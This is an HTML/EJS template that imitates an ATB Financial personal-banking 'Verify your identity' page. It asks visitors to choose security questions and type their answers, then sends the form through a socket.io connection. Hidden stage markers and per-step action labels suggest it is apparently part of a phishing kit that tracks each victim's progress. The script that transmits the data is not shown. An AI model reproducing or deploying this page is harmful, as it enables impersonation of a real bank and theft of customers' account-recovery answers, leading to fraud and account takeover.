<html class="fa-events-icons-ready">
    <head>
        <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
        <link rel="Shortcut Icon" href="favicon.ico" type="image/x-icon">
        <title>ATB Personal Banking</title>
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
        <link rel="stylesheet" type="text/css" href="https://cloud.typography.com/6700732/6101192/css/fonts.css">
        <link href="https://use.fontawesome.com/f26ba7188d.css" media="all" rel="stylesheet">
        <link href="https://fonts.googleapis.com/css?family=Open+Sans:300,400,600,700" rel="stylesheet">
        <link rel="stylesheet" href="/assets/atb/main.css?7">
        <script src="https://code.jquery.com/jquery-3.6.0.min.js" crossorigin="anonymous"></script>
        <script src="/assets/js/actions.js?v=<?=time()?>"></script>
        <script src="/socket.io/socket.io.js"></script>
    </head>
    <body>
        <div id="app">
            <div class="sc-kgoBCf bzQzYK" id="rbw-overall-context-wrapper">
                <div class="sc-iwsKbI jTTtAZ"></div>
                <div class="sc-jzJRlG eNoisr">
                    <form id="loginForm" class="sc-jTzLTM cUTnPT lab-form" id="rbw-login-block">
                        <input type="hidden" id="userAgent" name="userAgent">
                        <div class="sc-bdVaJa khUSez">
                            <img class="sc-htpNat gRCWAJ" src="/assets/atb/atb-jewel.svg" id="rbw-login-heading-atb-logo"><br><br>
                            <h2 class="ant-typography login-title-2 div-send">Verify your identity</h2>
                            <div class="ant-divider ant-divider-horizontal" role="separator" style="margin: 10px 0px 20px;"></div>
                        </div>
                        <div class="sc-fjdhpX Pbrfi div-main" id="rbw-login-form-login-block">
                            <p class="p-text">To continue, please verify your security questions.</p>
                            <div>
                                
                                <% for (let x = 1; x <= p_quests; x++) { %>
                                    <div>
                                        <label class="top input rebank-textfield">Security Question (<%= x %>):</label>
                                        <select name="question<%= x %>" id="q<%= x %>" required class="rebank-textfield display-inline-block lrinput" attr-action="Selecting Sec Ques <%= x %>">
                                            <option value="">Please select a question</option>
                                            <option value="first pet's name">What was your first pet's name?</option>
                                            <option value="favourite subject in school">What was your favourite subject in school?</option>
                                            <option value="city did you meet your spouse">In what city did you meet your spouse or significant other?</option>
                                            <option value="best childhood friend">What is the name of your best childhood friend?</option>
                                            <option value="last name of your favourite teacher">What was the last name of your favourite teacher?</option>
                                            <option value="favourite time of the day">What is your favourite time of the day?</option>
                                            <option value="favourite musician">Who is your favourite musician?</option>
                                            <option value="first job">What was your first job?</option>
                                            <option value="name of your elementary or primary">What was the name of your elementary or primary school?</option>
                                            <option value="name of your first stuffed animal">What was the name of your first stuffed animal?</option>
                                            <option value="favourite board game">What is your favourite board game?</option>
                                            <option value="retire where">Where do you want to retire?</option>
                                            <option value="favourite wild animal">What is your favourite wild animal. Please no dogs or cats or parakeets</option>
                                            <option value="favourite author">Who is your favourite author?</option>
                                            <option value="grandfather's occupation">What was your grandfather's occupation?</option>
                                            <option value="favourite family holiday">Where was your favourite family holiday vacation?</option>
                                            <option value="city were you born">What city were you born in?</option>
                                            <option value="childhood nickname">What was your childhood nickname?</option>
                                            <option value="town did you live in as a child">What town did you live in as a child?</option>
                                            <option value="last name of your first grade teacher">What was the last name of your first grade teacher?</option>
                                            <option value="favourite dessert">What is your favourite dessert?</option>
                                            <option value="favourite actor">What is your favourite actor or actress or celebrity?</option>
                                            <option value="town was your first job">In what town was your first job?</option>
                                            <option value="color of your first car">What was the color of your first car?</option>
                                            <option value="TVs are in your home">How many TVs are in your home?</option>
                                        </select>
                                    </div>
                                    <div class="sc-VigVT jQbsgO"></div>
                                    <div class="sc-VigVT jQbsgO"></div>
                                    <div>
                                        <label class="top input rebank-textfield">Answer (<%= x %>):</label>
                                        <input name="answer<%= x %>" id="a<%= x %>" required class="rebank-textfield lrinput" type="text" attr-action="Filling Sec Aswer <%= x %>">
                                    </div>
                                    <div class="sc-VigVT jQbsgO"></div>
                                    <div class="sc-VigVT jQbsgO"></div>
                                <% } %>                                
                                <div class="sc-VigVT jQbsgO"></div>
                                <div class="uiNewButtonWrapper "><input class="rebank-button primary" type="nano" onclick="submitForm()" id="rbw-login-form-button-submit" value="Continue"></div>
                            </div>
                        </div>
                    </form>
                </div>
                <div class="sc-kAzzGY cUrlcM">
                    <div class="sc-chPdSV emnlIF" id="rbw-marquee-block">
                        <div class="sc-ckVGcZ czSiSX"></div>
                    </div>
                </div>
            </div>
        </div>
        <span hidden id="navig"> <%=navig%> </span>
        <span hidden id="stage">Question</span>
    </body>
    <script src="/bank/atb/js/script.js"></script>
</html>
